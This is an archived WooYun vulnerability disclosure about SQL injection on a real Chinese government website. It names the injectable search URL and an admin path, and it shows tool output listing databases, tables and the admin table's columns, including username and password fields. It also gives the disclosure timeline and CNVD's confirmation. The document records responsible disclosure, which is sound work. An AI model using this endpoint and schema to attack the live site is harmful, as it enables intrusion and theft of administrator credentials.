乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-26: 细节已通知厂商并且等待厂商处理中 2015-03-02: 厂商已经确认,细节仅向厂商公开 2015-03-12: 细节向核心白帽子及相关领域专家公开 2015-03-22: 细节向普通白帽子公开 2015-04-01: 细节向实习白帽子公开 2015-04-13: 细节向公众公开
注入及第三方编译器漏洞
http://www.smmzj.gov.cn/Article_Search.aspx?KeyWord=1&pageNow=1available databases [21]:[*] master[*] model[*] msdb[*] QPAccountsDB[*] QPGameMatchDB[*] QPLandDB[*] QPNativeWebDB[*] QPPlatformDB[*] QPPlatformManagerDB[*] QPRecordDB[*] QPTreasureDB[*] ReportServer[*] ReportServerTempDB[*] smdmw[*] SmMzDitu[*] SmMzMap[*] smsmzj[*] smsylc00[*] tempdb[*] winiis
http://www.smmzj.gov.cn/smmzj008/htmledit/admin/default.asp
Database: smsmzj[15 tables]+----------------------+| dbo.Article || dbo.ArticleClass || dbo.FriendSite || dbo.Guest || dbo.InterviewContent || dbo.InterviewList || dbo.InterviewPic || dbo.Message || dbo.OpView || dbo.Opinion || dbo.SelectItem || dbo.Survey || dbo.Unit || dbo.tbAdmin || dbo.tbDepartment |+----------------------+
Database: smsmzjTable: dbo.tbAdmin[25 columns]+----------------------+----------+| Column | Type |+----------------------+----------+| AdminPurview_Article | int || AdminPurview_Others | nvarchar || ArticleDel | nvarchar || ArticleInputer | nvarchar || ArticleModify | nvarchar || ArticlePass | nvarchar || Dept_ID | int || Id | int || LastLoginIP | nvarchar || LastLoginTime | datetime || LastLogoutTime | datetime || LoginTimes | int || passed | bit || Password | nvarchar || Purview | int || Unit_ID | int || user_address | nvarchar || user_email | nvarchar || user_fax | nvarchar || user_phone | nvarchar || user_postcode | nvarchar || user_sex | bit || user_true_name | nvarchar || user_website | nvarchar || UserName | nvarchar |+----------------------+----------+
百度慢慢修复吧
危害等级:中
漏洞Rank:10
确认时间:2015-03-02 15:55
CNVD确认并复现所述情况,已经转由CNCERT下发给福建分中心,由其后续协调网站管理单位处置。
暂无